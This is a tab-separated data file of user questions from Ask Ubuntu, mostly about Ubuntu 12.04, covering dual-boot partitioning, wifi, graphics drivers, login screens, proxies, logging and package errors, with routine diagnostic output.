135025	how can i modify my partitions so i can install ubuntu and not damage my windows installation ?	i have an hp pavilion g7 with a 500gb hd and 4gb ram . my first problem was while i was installing ubuntu 12.04 for the first time on this laptop . i accidentally deleted windows 7 . so i installed ubuntu 12.04 on the entire disk . then i decided to install windows 7 again . so i made a partition and installed windows into that partition . i knew i might lose ubuntu but did not consider that a problem because i was already thinking of installing ubuntu again . the problem is that i ca n't install ubuntu into that partition . i tried deleting the partition , but in windows i ca n't merge the partition so i can follow the instructions on ubuntu when it makes a partition for itself . ( and i do not want to break the machine again . ) this is how my disk is partitioned . 270gb unallocated 100mb system 200gb c : / ( windows 7 ) 20mb ( i do n't remember ) i want to merge the number 1 with number 3 and then start installing ubuntu . when i try to install ubuntu with that partition it will not let me install . the install is not allowed because there are more than 3 primary partitions or something like that . the system will not allow me to create another primary partition . any suggestions ? i just want to merge the partition c : / disk with the partition i made so i can install ubuntu in a new partition created at the moment . i searched in forums and blogs and they all said that once i delete a partition windows is able to `` expand '' the c : / disk . but in my case , i ca n't do that . i assume that i ca n't because i created that partition before i installed windows 7 again . i would appreciate any suggestions . if i could i would delete windows but i depend on it for my work .
135026	mouse is freezing in ubuntu/xubuntu/lubuntu	i 'm using ubuntu for a while now but since 11.10 i noticed some strange behavior . and even with lubuntu , xubuntu and kubuntu i have the same problem . problem : after i logged into my account and used the system for while i am unable to use the system with my mouse . i can navigate through the open windows using the keyboard and even close them , start new , etc . i can move the mouse over the whole desktop but can not click on anything , even in the window which seems to be focused a click with the mouse has no effect on a button.sometimes i able do draw some squares with the mouse on the desktop but nothing more . the problem even occurs when i am using a live cd/usb stick . when using an installtion of -buntu in a virtual pc there are no problems . so this problem only exist when it is installed as a `` real '' os . in an older installation of ubuntu i solved it by right-clicking on the window which seems to be focused and after that the mouse was `` released '' but this time this does not work . my system : os : xubuntu 12.04 mouse : trust max track cpu : amd athlon ii x3 425 graphics : ati radeon hd 4550
135036	magic mouse multitouch in ubuntu 12.04	i 'm trying to set up ubuntu as my daily driver on my 27 inch imac . would the solution for the magic trackpad work with the magic mouse as well ? this is a work computer , so i do n't want to spend too much time tumbling down rabbit holes .
135042	migrating users from madriva	my company switces from madriva to ubuntu 12.04 . we use an nfs mounted /home . i migrate the users by copying passwrd , shadow and group under /etc in the newly installed ubuntu and also mount the /home disk we use . after that i reboot and ubuntu crashes with message of bad graphics configuration . any help on that will be highly appreciated
135043	what is the best method to build ubuntu linux from scratch ?	i want to try out `` linux from scratch '' ( lfs ) using ubuntu . since i know this could mess up my current linux system , i want to know what is the best way to proceed . what i 've read so far is that i need a dedicated partition which is quite difficult to do with my current system . is installing another ubuntu in a virtualbox virtual machine and doing the work there the best way to go ? or is there a better solution ?
135047	ubuntu 12.04 is not showing on system start up ?	i already installed windows first and then installed linux mint12 . the boot screen is changed to grub , and is first showing linux mint loading and then windows at last . today i installed ubuntu 12.04 and installed along side with windows and is not showing on boot menu . can any body helps me ?
135050	gpg command : -- list-sigs only from trusted keys ?	whenever i use gpg -- list-sigs command i risk getting tons of `` spam '' from sigs of people i do not know . is there a command in gpg where i can -- list-sigs but only sigs from keys that i have marked as having a trust level ? what is this command ?
135051	wifi on ubuntu 12.04 custom : downloading unbearably slow	iwconfig reports 11 mbps , yet i 've seen as low as < 1 kbps . this is the latest in my laundry list of ubuntu problems in a dual-boot machine ( cyberpowerpc custom , intel i7-3820 , nvidia gtx 570 ) . i received it two days ago , windows 7 running fine , still having problems with ubuntu . the browsing is intermittent but unacceptable . e.g . i could get to this site last night but i could n't post this question . the downloading is unbearably slow , i ca n't download anything or install any packages because the speed is so slow . e.g . i am trying to install vim which is inexplicably missing from my 12.04 install ( add another one to the problems list ) and my download speed reported in the terminal was 241 b/s . yes , bytes . iwconfig reports 11 mbps , which further adds to the confusion . user @ ubuntu : ~ $ iwconfig lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' linksys '' mode : managed frequency:2.437 ghz access point : 00:18:39:76:2c : a1 bit rate=11 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=36/70 signal level=-74 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:54 invalid misc:18 missed beacon:0 eth0 no wireless extensions . any ideas ? i see this is a problem a lot of people , but none of the on line solutions have worked for me so far . e.g . one site recommends editing the ath9k.conf file in /etc/modprobe.d , yet this file is n't even in the folder : user @ ubuntu : / $ cd etc/modprobe.d user @ ubuntu : /etc/modprobe.d $ ls alsa-base.conf blacklist-oss.conf blacklist-ath_pci.conf blacklist-rare-network.conf blacklist.conf blacklist-watchdog.conf blacklist-firewire.conf dkms.conf blacklist-framebuffer.conf nvidia-current_hybrid.conf blacklist-modem.conf nvidia-graphics-drivers.conf i think the nvidia gpu might be mucking things up . i had the `` blinking cursor '' problem when installing in the first place , and then i had the monitor out of range problem as well . i have my faithful asus laptop , which is running ubuntu 12.04 just fine . the only difference is executing host -t soa local in the terminal gives user @ ubuntu : ~ $ host -t soa local local has soa record local . nobody.localhost . 42 86400 43200 604800 10800 in my new machine , and the command reports host local . not found in the laptop . help would be most welcome , as i am in danger of reverting back to windows . i 'm seriously considering it . sorry for the length , trying to show my effort in resolving the issue and include terminal snippets that might be helpful .
135053	how to change unity 's default login screen to allow users to type in their logins and passwords ?	installed pangolin 12.04 x64 i would like to change the login screen . the default screen let 's you choose the user by scrolling which can be a nightmare if you have a lot of users . i just want the user to type login and password .
135058	is it possible to reorder my workspaces ?	recently i found that on a macbook it is possible to drag the multiple desktops to change their order . the ideal solution would be to , while on the compiz expo mode , be able to just drag and move a whole workspace together with all the windows it contains to another position . searching for this i found an ubuntu braistorm idea that describes exactly what i would like to be able to do ! a work around using a command line script could also be used maybe.. ? any ideas ?
135063	how to show google calendar events in the clock widget ?	i 've just added google calendar account in korganizer and it works fine , but these events do n't show up in the clock widget . is it possible ? note : this question is about kde .
135064	ubuntu 12.04 not recognising my new wireless `` super hub ''	i 'm fairly new to ubuntu , and this is the first time i 've reached out and asked for help . please let me know if you need any more information . i did a clean install of ubuntu 12.04 ( 64-bit ) replacing ubuntu 10.10 ( 32-bit ) on my samsung n150plus netbook last week . just before i did the install , we had a new router fitted with a new network and password etc . my netbook worked fine with this router when it was using 10.10 . but immediately after i installed 12.04 , the ssid for that network was no longer detected . it does not come up in the list of available wireless networks . however , if i use a wireless usb adapter/stick , it connects fine . the netbook 's internal wifi also works when used with other wireless networks . but not with this one router . please let me know if i can give any more information that would help to solve the problem . some other details copied from comments the router is a virgin media super hub ( vmsh ) made by netgear . my samsung n150plus connects with no problem to other wifi networks . i appear to only have problems with this router . i tried using a friend 's mac and it had no problem establishing a wifi connection to this router .
135069	custom compose key sequences without xim ( e.g . in sublime text 2 )	i have quite a few custom compose key sequences . i know i can get them working with an ~/.xcompose and switching the input method to xim . however , sublime text 2 does n't accept any compose key sequences when i 'm using xim . it does accept them when i 'm using the default input method . i think i reported this bug for sublime text 2 a while ago . using the default input method , i added the contents of my ~/.xcompose to /usr/share/x11/locale/en_us.utf-8/compose but this did not change anything . is there any way i can get the compose key sequences in my ~/.xcompose to work without relying on xim ?
135072	how to install rhythmbox spotify plugin ?	is there an easy way to install the spotify plugin for rhythmbox in ubuntu 12.04 ? i can only find links to recompile rhythmbox completely and the instructions are n't very clear .
135073	thunderbird inbox wont open 12.04	i get the alerts for new mail and can compose new mail from the bar at the top , but the inbox refuses to load . reinstalling did not work . the icon will appear on the sidebar but once clicked nothing happens .
135075	i ca n't install ubuntu . the error is : speech-dispatcher disabled	i want to install ubuntu 12.04 64 bits in a new dell xps 13 . when i am trying to install appears this message : speech-dispatcher disabled and after that black screen . thanks in advance for the help
135077	login screen all screwed up on wakeup from suspend	i am new to linux/ubuntu . any input is greatly appreciated . i am using ubuntu 12.04 on an eeepc 1101ha . using the intel gma500 `` poulsbo '' video hardware . the display graphics are fine at all times when i power on the computer fresh , but as soon as i close the lid or suspend from the cog menu and i wake up the computer , it looks like this : every second line of pixels is black , the display seems to be on a angle and repeated 3 times , and the middle section works for clicking and interacting with the mouse . everything works normally , it just appears to be the graphics . will this problem be solved if i install an older version of ubuntu like 11.10 ? any insights into where i should be looking/reading up on how to fix this are greatly appreciated .
135078	how do i install ubuntu 12.04 lts ?	my problem is that i had already installed it in a pendrive , but i formated my lap top and the pendrive , i did n't uninstall ubuntu . when i finished installing the new os i installed ubuntu again in the pendrive . when i tried to update ubuntu i had problems and i decided to download the latest version . i formated the pendrive again , but when i tried to install ubuntu 12.04 lts the installer told me that i have already intalled ubuntu and the installation ca n't advance . also when i turn on my computer when i have to select an os there are two ubuntu options , how do i get rid of that ?
135079	ubuntu live cd does n't boot properly	i am using a macbook pro and just wanted to check out ubuntu . i could n't get a usb flash drive for booting ubuntu , so i decided to use a cd instead . i thought it was working fine , as it seemed to boot from the live cd , but after the ubuntu loading screen it just went into terminal , or whatever it uses . i.e. , no gui , etc.. it said something about not detecting drives ? does anyone here know what i did wrong ? i 'm using ubuntu 10.10 ( maverick meerkat ) .
135085	how do i install drivers on an alienware m11x ?	i installed ubuntu 12.04 on my alienware m11x , which has both integrated and discrete graphics . i also installed gnome-shell , but upon login it defaults to fallback mode . i 'm pretty sure this is an issue with the graphics drivers . however , there are no graphics drivers listed in the 'additional drivers ' so i 'm not sure what drivers i need . i know even the discrete graphics are capable of running gnome shell ( i had linux mint previously installed and it ran gnome shell fine ) , its just a matter of installing the right drivers . are there some drivers i can install from the command line ? i also found this page : http : //intellinuxgraphics.org/ but i have no idea what i need . any help would be awesome .
135089	proxy exceptions in 12.04 lts	how do i setup proxy exceptions under ubuntu 12.04 ? already tried the proposed solutions for earlier ubuntu versions and none seem to work . there is no network proxy preferences in 12.04 afaik . system settings - > network - > network proxy does not offer the possibility to add exceptions . is there a file where these settings reside so i can edit them manually and add exceptions ( and so the settings are honored by all network apps ) ? i would really appreciate any info on this one not already mentioned on earlier answers , as none of theme worked for me . thanks !
135090	how to enable 'tab'bing in unity dash ( 12.04 )	i have done a clean install from ubuntu 11.10 to 12.04 . when i open the dash with the super key in 11.10 , i used to tab between all the lenses . however in 12.04 this seems to have been disabled . how do i enable it ?
135092	can i use ubuntu on this desktop ( for gaming ) ?	this is my first post . i know there are a lot of very similar questions like this , but no one has my pc specs or i did n't found one with them . well , here is the story . since 2010 i have been using ubuntu in my netbook , which makes it 10 times faster . so , i tried to test the new ubuntu 12.04 in my desktop which i use for games ( in steam ) and it went really really well , i was amazed over the speed of programs , boot and everything . but , here is the problem . as you read before , i use this deskto for gaming . i know native steam is coming eventually for linux , but i 'm very impacient . do you think i could play smoothly source games along with steam in this computer , running wine and/or playonlinux ? pc specs : intel dual core e5300 @ 2.60 ghz ( 64 bits ) gygabite nvidia geforce 9800 gt 1 gb 4 gb ram ddr2 500 gb seagate harddrive ( unknown model )
135103	how can i start all applications maximised ?	is it possible to start any and all applications maximised ?
135104	dell latitude d510 is n't booting ubuntu from a usb	i pressed f12 at start up , and i selected 'boot from usb '' . the screen then fades out , and the windows xp logo appears ( indicating it has not been loaded and it has loaded from the hard drive instead ) . can anyone help me with this ? i need help asap since i need ubuntu to fix a problem on my laptop .
135106	what is the purpose of `dnsmasq` running listening on `127.0.0.1` interface ?	i discovered an instance of dnsmasq running on my fresh install of xubuntu desktop . the general purpose of dnsmasq is known to be a dns relay and dhcp server . the running process is reported as follows : /usr/sbin/dnsmasq -- no-resolv -- keep-in-foreground -- no-hosts -- bind-interfaces -- pid-file=/var/run/sendsigs.omit.d/network-manager.dnsmasq.pid -- listen-address=127.0.0.1 -- conf-file=/var/run/nm-dns-dnsmasq.conf -- cache-size=0 -- proxy-dnssec looks like it is spawned by network-manager . contents of mentioned files are : # cat /var/run/nm-dns-dnsmasq.conf server=192.168.2.1 in my local network 192.168.2.1 indeed is a dns server . i can not understand why this instance of dnsmasq listens on 127.0.0.1 since i see no way to serve dns relay and dhcp server on 127.0.0.1 interface .
135110	could rsyslog be purging log files ?	today i found a lot of log files empty , these were : /var/log/auth.log /var/log/syslog /var/log/daemon.log /var/log/kern.log /var/log/mail.log /var/log/user.log /var/log/mail.info /var/log/mail.warn /var/log/mail.err /var/log/messages first , it made me wonder if i had been hacked and someone had been deleting their traces . but looking around the web for clues and searching for suspicious activity , i did n't find any . i decided to try and restart rsyslog . and what do you think ? the logs are coming in again , actually showing me someone is trying to brute-force ssh users . so i turned off password login for sshd . so , my question is : does rsyslog sometimes hang , and stop logging ? could this be a logrotate issue ? the syslog.1 files and similar have log data .
135111	using ubuntu cloud as cloud storage for all ubuntu installations	is it possible to use the ubuntu server cloud as a storage solution for all of my ubuntu installations . as in , the same way the ubuntu one service works , where it is synced with all of my computers if i choose that as an
135112	synchronizing/merging empathy logs and google chat logs	if i use empathy to log into my google account and chat with people , i can enable logging and have it save chat logs to my computer . the problem is , i do n't only use one computer , so i end up with logs all over the place . i could use dropbox or something to synchronize them , but that only works on computers i use empathy on . i would still lose out on chat logs that i make from within gmail or google plus or on my phone or anywhere else . an ideal solution for me , as someone who only chats through my google account , would be if empathy would just use google 's chat log , the same one i access through gmail . this would be used to display previous conversations when a chat window is opened , and to view chat logs in empathy 's ui . is this possible ? i tried googling but i could n't even find anyone asking this question .
135113	how to change the time for os selection menu in grub ?	i have windows 7 and ubuntu 12.04 in my system and i saw that the default time for os selection menu is only 10 sec , as i am new to linux can anyone tell me how to increase this time ?
135118	is a brightness control widget available ?	is it possible to place a slider or some other gui component on the desktop / notification panel on ubuntu 12.04 to control the screen brightness ? it 's a little annoying to constantly have to go to the system settings to turn the brightness down .
135120	problem sending an email via mutt	i 'm trying to send an email using mutt like this : echo 1.txt | mutt my_email @ gmail.com -s hello -a file.tar.bz2 it 's getting no error , but i did n't receive the email . what 's the problem ?
135122	reduce the mouse sensitivity	is there anyway to reduce the mouse sensitivity in ubuntu 12.04 ? i 've used the slider on the systems settings to set it to the lowest point but it 's still too fast .
135124	ifort with geany problem	i 've changed my build/compile commands on geany to use intel 's fortran : ifort -c `` % f '' ifort `` % f '' -o `` % e '' when i try compiling , i get the following error : ifort `` file.f90 '' -o `` file '' ( in directory : ... ) compilation failed . /bin/sh : 1 : ifort : not found however , i can type ifort -o file file.f90 in terminal and it will compile with no problem . i can open geany from terminal with the command `` lang=c geany -- verbose '' which fixes geany 's inability to find ifort , but have not found a way to get the unity launcher to use that . so : does anyone know how to get unity launcher to use the command or fix geany to accept ifort without above command ?
135125	how long does it take to install ubuntu 12.04 ?	i have started an install of ubuntu 12.04 on a computer with a pentium 4 2.0ghz cpu , and 1gb ram partitioned with windows xp home , and i am wondering how long it will take to complete ? so far it has taken 2 hours and counting . as i then need to plan whether to get my old laptop out for a bit while this one does it 's thing ... or to just do my stuff off my iphone .
135126	how to remove 'system settings ' from title bar of ubuntu 12.04 lts	i want to remove system settings , displays , software up to date from the unity bar ( title bar ) of the new ubuntu 12.04 lts .
135129	are there any good alternatives to garageband available ?	are there any good linux alternatives to garageband ? the most important features would be : good audio recording , with audio filters good midi editing abilities and a good selection of instrument synthesisers , that can be 'played ' on a virtual keyboard ideally it would be lovely to find all these features in one package but i 'm definitely not against using multiple programs .
135135	alternative to little-snitch app-firewall ?	i 'm trying out ubuntu . been a mac user . i like ubuntu a lot but i 'm uncomfortable not having an app-firewall that reports what connections are being made to the internet . i find it unnerving to not have any control over what can & can not connect to the internet . little snitch works great on the mac for this purpose . is there anything comparable on ubuntu ? the default ufw firewall can not stop apps from connecting so is pretty useless .
135138	second monitor detected , but not receiving a signal after upgrading to 12.04	after i upgraded to 12.04 , my second monitor is detected ( in display settings ) , but will not power on . i have scoured the internet and forums for a solution and i ca n't find anything . i have found a couple people with the same problem , but never a solution for it . i am no expert , but i 'm certainly not a noob . my computer uses amd radeon 6250 graphics , but i do not want to use the proprietary graphics drivers . they refuse to work properly with my second monitor ( they ati drivers will only mirror screens , and i 've done everything to try to fix it , and i don't want mirrored screens ) not to mention that the default open-source video drivers seem to work much better than the proprietary anyway ! again , ubuntu 's default video drivers work fine , and they even detect the second monitor ( dell 19 ' ) . i can drag stuff off the screen and put it on the 'space ' of the second monitor and even a screen-shot shows that there are two monitors active ; but the monitor is off . it will not power on . it goes into 'power-save ' mode because it is not receiving a signal . for some reason it is not getting the signal to power on , even though ubuntu thinks the monitor is working properly . i had this working fine on my sony vaio yesterday ( with radeon graphics/default ubuntu video drivers ) . i upgraded to a samsung series 3 and now i have this issue . i ca n't for the life of me figure out why the monitor is connected , detected and i have screen space for the monitor , but the screen wo n't turn on ! xrandr output : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 vga-0 connected ( normal left inverted right x axis y axis ) 1440x900 59.9 + 75.0 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 lvds connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 60.1*+ 1280x720 59.9 1152x768 59.8 1024x768 59.9 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 hdmi-0 disconnected ( normal left inverted right x axis y axis )
135146	how to add checkbox or radio buttons to a unity quicklist ?	i have been searching how to make that happen but i ca n't find it anywhere . i even guessed how to enable/disable the quicklist item , so as how to add function invoked after the item is clicked , but that 's all . any ideas ? i want to make a quicklist for my app which will consist of checkboxes or radio buttons . i found info how to add items without associated action to the quicklist ( tutorial ) but that 's all i found , there is no information how to add other types of items ( checkboxes , radio buttons , horizontal dividers or item with associated action ) which are mentioned there . i 'm trying to get something like this .
135147	empathy does not allow wlm accounts after upgrade to ubuntu 12.04	after upgrade to ubuntu 12.04 , all my accounts previously configured in empathy were deleted . then , i tried t set them up again , but i see that the wlm accounts are not an option in the account types allowed by empathy . any help ?
135148	how do i use `` ld_preload '' to control what apps can and can not connect to internet ?	i 'm trying out ubuntu . been a mac user . i like ubuntu a lot but i find it unnerving to not have any control over what apps can & can not connect to the internet . i was advised that `` ld_preload '' can be set so that i can permit firefox traffic over port 80 but prevent dash from connecting to port 80 . can someone explain how i can accomplish this with ld_preload ?
135153	where is the download link for 10.04 desktop ?	i am looking for an older version of ubuntu . please tell me where i can find the download link for 10.04 desktop . thanks
135166	unity 3d not available on ubuntu 12.04 with ati radeon 4570 card	i have a dell studio 1555 with ati radeon hd 4570 card in it . upon running unity support test , it says unity 3d is not supported . shantanu @ greenhead : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : ati technologies inc. opengl renderer string : ati mobility radeon hd 4500 series opengl version string : 1.4 ( 2.1 ( 3.3.11627 compatibility profile context ) ) not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : no gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no does this mean that 3d will not work at all or it requires some additional drivers , etc. ? i tried installing flgrx using apt-get as well as using additional drivers from the menu , but neither helped . how can i get 3d working on this card ? edit : someone on ubuntuforums had similar issue and got it resolved , but can not make out what exactly did he do to solve it .
135174	ubuntu 12.04 broadcom wireless not working after b43	i have a dell laptop . i was running ubuntu 11.10 32 bit . during that time wireless was working fine . yesterday i updated my os to 12.04.now wireless is not working . i have tried installing b43 installer and b43 cutter from software center and activate broadcom driver . it did not work . whenever i try to activate the driver , i get error saying installation failed look at /var/log/jockey.log i have opened jockey log and here is the log : 2012-05-10 15:20:00,182 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-05-10 15:20:00,191 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-05-10 15:20:00,205 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-05-10 15:20:01,666 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-05-10 15:20:05,370 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2012-05-10 15:20:05,372 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2012-05-10 15:20:05,424 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted* is there anything i could do to get wireless working on my laptop ? i do not want to go back to windows 7 . should i have to do a fresh installation of 12.04 ?
135176	intel n10 graphics	español : buen día . instalé en una notebook ubuntu 12.04 pero me da el problema que solamente me da dos resoluciones de pantallas 800x600 y 1024x768 ... en la primera se ve muy grotesca la pantalla y en la segunda se ve bien , pero falta un pedazo de pantalla arriba y abajo ... he tratado de buscar información sobre el tema pero parece uno de esos `` bugs '' que no han conseguido ser erradicados ... intenté hacer el xorg.conf y esas cosas y nomas no se puede ... recurro a su sapiencia y experiencia en este tipo de problemas ... la mini es una lanix neuron lt , procesador intel atom n450 y la tarjeta intel corporation n10 family integrated graphics controller ... . inglés : good day . i installed ubuntu 12.04 on a notebook but i get the problem that only gives me two screen resolutions of 800x600 and 1024x768 ... the first screen looks very grotesque and the second looks good , but missing a piece of screen up and down ... i tried to find information on the subject but it seems one of those `` bugs '' that have failed to be eradicated ... i tried to do the xorg.conf nomas and stuff and you can not ... i appeal to your wisdom and experience in this kind of problem ... the mini is a neuron lanix lt , intel atom n450 processor and the intel integrated graphics family corporation n10 controller ... .
135177	prevent prompt to change filenames at system boot	i 'm maintaining an application on ubuntu 8.04 . the application has a facility to change the language and then reboot . when it reboots a dialog box is presented that asks if i want to change the filenames to the new language . i do n't want to do so . i never even want to see that box . how can i do this ? more info : the application changes the language by rewriting /etc/default/locale calling setlocale ( ) rebooting the system is configured so that the user never sees ubuntu . the system is set to autologin a particular user and that user 's gnome configuration files start the ( full screen ) application . the prompt to change filenames is displayed before the user is auto-logged in and only displays for a few seconds . i would not like it to be displayed at all . does anyone know where this happens in the boot process and how i can disable it ?
135178	transmission remote gui setup hangs on dht attempting to bootstrap	i 'm trying to install transmission on ubuntu server 12.04 . but i 'm running into few issues , the main one now is that the setup seems to hang on : dht attempting bootstrap from dht.transmissionbt.com ( tr-dht.c:247 ) here is the guide i have followed : link . installing the transmission daemon went fine , but when i tried to configuring it , it gave me the above issue . the command is : transmission-daemon -f -t -u your_username -v your_password -w /path/to/downloaded/torrents -g /etc/transmission-daemon/ at first i used ' & ' symbol in the password and that messed some things up . i restarted the server and then used the same command with a password without ' & ' it goes through . the command does hang for a while on the line transmission-daemon requiring authentication ( daemon.c:508 ) but then after say 20 seconds or so , it goes on to the line dht attempting bootstrap from dht.transmissionbt.com ( tr-dht.c:247 ) it hangs there for over 10 min . the next line should be something about starting port forwarding . when i look for the files that the command should have created , they look fine , username is set , not sure where to find the password though . still i can not continue , and if i quit the command with ctrl+c , when i run the remote gui , it does n't connect ( it does n't say more than that ) . any idea what is wrong ? any idea on how to go about figuring this out ? sidenote : when running transmission-daemon -f -t -u your_username -v your_password -w /path/to/downloaded/torrents -g /etc/transmission-daemon/ for the first time , it said it failed to allocate the correct size to something udp , and said to edit a file to specify the larger size . i did so , rebooted , and that issue was gone once re-trying . not sure if this helps but this is what comes after executing the command : [ 22:31:21.566 ] transmission 2.51 ( 13280 ) started ( session.c:718 ) [ 22:31:21.567 ] rpc server adding address to whitelist : * ( rpc-server.c:803 ) [ 22:31:21.567 ] rpc server serving rpc and web requests on port 127.0.0.1:9091/transmission/ ( rpc-server.c:997 ) [ 22:31:21.568 ] rpc server whitelist enabled ( rpc-server.c:1001 ) [ 22:31:21.568 ] rpc server password required ( rpc-server.c:1004 ) [ 22:31:21.568 ] port forwarding stopped ( port-forwarding.c:181 ) [ 22:31:21.569 ] dht generating new id ( tr-dht.c:309 ) [ 22:31:21.569 ] using settings from `` /etc/transmission-daemon/ '' ( daemon.c:488 ) [ 22:31:21.569 ] saved `` /etc/transmission-daemon/settings.json '' ( bencode.c:1731 ) [ 22:31:21.570 ] transmission-daemon requiring authentication ( daemon.c:508 ) [ 22:32:13.576 ] dht attempting bootstrap from dht.transmissionbt.com ( tr-dht.c:247 ) ^c [ 22:57:39.319 ] saved `` /etc/transmission-daemon/settings.json '' ( bencode.c:1731 ) [ 22:57:39.320 ] dht saving 67 ( 67 + 0 ) nodes ( tr-dht.c:366 ) [ 22:57:39.320 ] saved `` /etc/transmission-daemon//dht.dat '' ( bencode.c:1731 ) [ 22:57:39.321 ] port forwarding stopped ( port-forwarding.c:181 ) closing transmission session ... done .
135182	how do i add 'webcam ' back under 'attached devices ' in the session indicator ?	i was wondering if there is a way to add 'webcam ' back under 'attached devices ' in session indicator on ubuntu 12.04 as i know it from 11.10 ( image ) : i ask because it was a simple and intuitive way to quickly boot a webcam , snap a picture , and get back too work .
135186	12.04 on intel i7 extreme	ubuntu 12.04 will not install on msi big bang 2 xpower mobo with intel i7 3630 - ? black screen with blinking cursor and lots of cd and cpu activity , but nothing further happens . memory ( 8 gb ) and net ok. video msi n560 gtx .
135187	corrupt database ? ubuntu 12.04	i have ubuntu 12.04 x86 single boot on an acer extensa 5635zg and when installing xserver xinput ( drivers for xinput controller ) it gave an error i dont remeber , after that i have n't been able to install anything at all it always says corrupt data or something like that and tells me to run and then ... . gamerx @ gamerx-ubuntu : ~ $ sudo apt-get -f install [ sudo ] password for gamerx : reading package list ... ready a construir árvore de dependências a ler a informação de estado ... pronto a corrigir dependências ... feito os seguintes pacotes extra serão instalados : xserver-xorg-input-joystick will be updated : xserver-xorg-input-joystick 1 pacotes actualizados , 0 pacotes novos instalados , 0 a remover e 4 não actualizados . 1 pacotes não totalmente instalados ou removidos . é necessário obter 0 b/22,9 kb de arquivos . após esta operação , será libertado 75,8 kb de espaço em disco . deseja continuar [ y/n ] ? y dpkg : problemas com dependências impedem a configuração de xserver-xorg-input-joystick : xserver-xorg-core ( 2:1.11.4-0ubuntu10.1 ) estraga xserver-xorg-input-joystick ( < = 1:1.5.0-3 ) e é instalado . a versão de xserver-xorg-input-joystick a ser configurada é 1:1.3.2-1ubuntu1 . xserver-xorg-core ( 2:1.11.4-0ubuntu10.1 ) estraga xserver-xorg-input-2.1 e é instalado . xserver-xorg-input-joystick ( 1:1.3.2-1ubuntu1 ) disponibiliza xserver-xorg-input-2.1 . dpkg : erro ao processar xserver-xorg-input-joystick ( -- configure ) : problemas com dependências - a deixar por configurar nenhum relatório apport escrito pois maxreports já foi atingido foram encontrados erros enquanto processava : xserver-xorg-input-joystick e : sub-process /usr/bin/dpkg returned an error code ( 1 ) english translation : the building dependency tree reading state information ... ready correcting dependencies ... done the following extra packages will be installed : xserver-xorg-input-joystick will be updated : xserver-xorg-input-joystick 1 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . 1 not fully installed or removed . you must obtain 0 b/22 , 9 kb file . after this operation , will be released 75.8 kb of disk space . want to continue [ y / n ] ? y dpkg : dependency problems prevent configuration of xserver-xorg-input-joystick : xserver-xorg-core ( 2:1.11.4-0ubuntu10 .1 ) spoils xserver-xorg-input-joystick ( < = 1:1.5.0-3 ) and is installed . the version of xserver-xorg-input-joystick 1:1.3.2 is to be set-1ubuntu1 . xserver-xorg-core ( 2:1.11.4-0ubuntu10 .1 ) spoils xserver-xorg-input-2.1 and is installed . xserver-xorg-input-joystick ( 1:1.3.2-1ubuntu1 ) provides xserver-xorg-input-2.1 . dpkg : error processing xserver-xorg-input-joystick ( - configure ) : dependency problems - leaving unconfigured no apport report written because it has already been reached maxreports errors were encountered while processing : xserver-xorg-input-joystick plz help me i have no idea how to solve this
135192	lenovo thinkpad w520 not booting with nvidia card enabled	on my lenovo thinkpad w520 i can switch between nvidia optimus or integrated card . since a couple of days , my ubuntu does n't start any more with the nvidia card . the boot process stop itself at this point and at this moment the fan runs at full speed ( because the video card heats a lot , more than in a normal usage ) and the disk is not in use . i do n't understand the correlation , but if i start on windows , i plug my monitor in the display port and i choose `` disconnect projector '' , when i reboot , ubuntu works ( just one time ) how can i fix this problem ?
135196	compiz effects do not function on login , only after manual enabling	i have set the bottom left corner to window scale and the bottom right corner to show desktop . these effects do not work after login/boot . i have to open ccsm , remove the binding , click ok , reset the binding , click ok again and then it works . and then i have to do the same thing for the other corner . when i reboot the settings again wo n't work , although they are clearly activated and shown correctly in ccsm . everything worked fine under 11.10 so i do n't know what to do . my computer is asus 1215n with a fresh install of 12.04 64bit and bumblebee . so far i tried putting the compiz -- replace command in the startup applications , but while this worked once , it did not work afterwards anymore so i am back to square 1 .
135198	how do i fix a `` gksu nautilus '' command error in terminal ?	when i type `` gksu nautilus '' in terminal , im getting the following error message ( gksu:10491 ) : gtk-warning ** : unable to locate theme engine in module_path : `` aurora '' i have n't a clue were to start
135199	upgrading gnome shell extensions	i recently upgraded to ubuntu 12.04 , and all the gnome shell extensions listed by the gnome tweak tool are disabled . what 's the easiest way to fix/upgrade them ? do i need to manually delete , re-download and install them ?
135200	is there a way to edit the windows registry from ubuntu ?	my laptop is a windows 7 / ubuntu 12.04 lts dual-boot setup . i 've been experimenting with alternative desktop shells on my windows partition , such as kde and cairo . after setting cairo as my default shell , i decided to restart my computer and log back into windows just to make sure everything was working properly . however , after logging in , i found myself left with nothing but the mouse cursor and a blank desktop filled with the default background color . i know the registry setting i need to change in order to restore windows explorer as the default shell from my prior experimentation with kde , but i obviously ca n't use regedit if i ca n't load into a working desktop . however , i can still use my ubuntu partition with no problems . this has me wondering if there is a way i can mount my windows partition in ubuntu and somehow edit the registry from there . how would i go about doing this , and do i need any extra packages for it ?
